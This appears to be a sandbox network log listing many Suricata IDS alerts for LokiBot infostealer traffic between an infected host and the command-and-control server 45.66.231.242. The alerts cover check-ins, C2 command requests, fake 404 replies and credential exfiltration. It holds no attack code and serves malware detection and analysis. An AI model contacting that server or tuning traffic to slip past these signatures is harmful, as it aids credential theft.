Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49763 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49730 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49733 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49769 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49772 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49731 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49788 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49773 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49737 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49788 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49737 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49732
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49754
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49805
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49825 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49753 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49769 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49753 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49825 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49763 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49763 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49772 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49753 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49772 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49753 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49744 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49763
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49744 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49753
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49776
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49825 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49744 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49742 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49737 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49772 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49825 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49788 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49788 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49841 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49774 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49769 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49841 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49738 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49731 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49756
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49737 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49777 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49738 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49736 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49767 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49735 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49769 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49740
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49755 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49755 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49755 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49829 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49738 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49755 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49738 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49801 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49739 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49788
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49733 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49733 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49801 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49801 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49733 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49792 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49769
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49792 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49800 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49752 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49827 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49744 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49801
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49827 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49731 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49827 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49737 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49807
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49752 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49821 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49735 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49760 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49831 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49811 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49783 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49811 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49783 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49783 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49749 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49738
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49757 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49800 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49780 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49780 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49757 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49829 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49736 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49737
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49735 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49733 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49827 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49767 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49827 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49767 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49773
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49811 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49742 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49742 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49812 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49812 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49779 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49780 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49783 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49779 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49783 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49841
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49829 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49739 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49755 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49780 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49766 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49772
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49819 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49819 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49766 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49777
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49825
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49739 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49739 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49824 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49824 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49824 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49767
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49736 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49812 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49736 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49739
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49787 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49787 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49787 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49779 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49834 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49787 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49742 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49742 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49821 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49821 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49786 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49786 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49786 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49829 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49829 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49829
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49819 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49800 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49779 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49839 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49831 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49786 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49774 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49786 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49827
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49821 -> 45.66.231.242:80
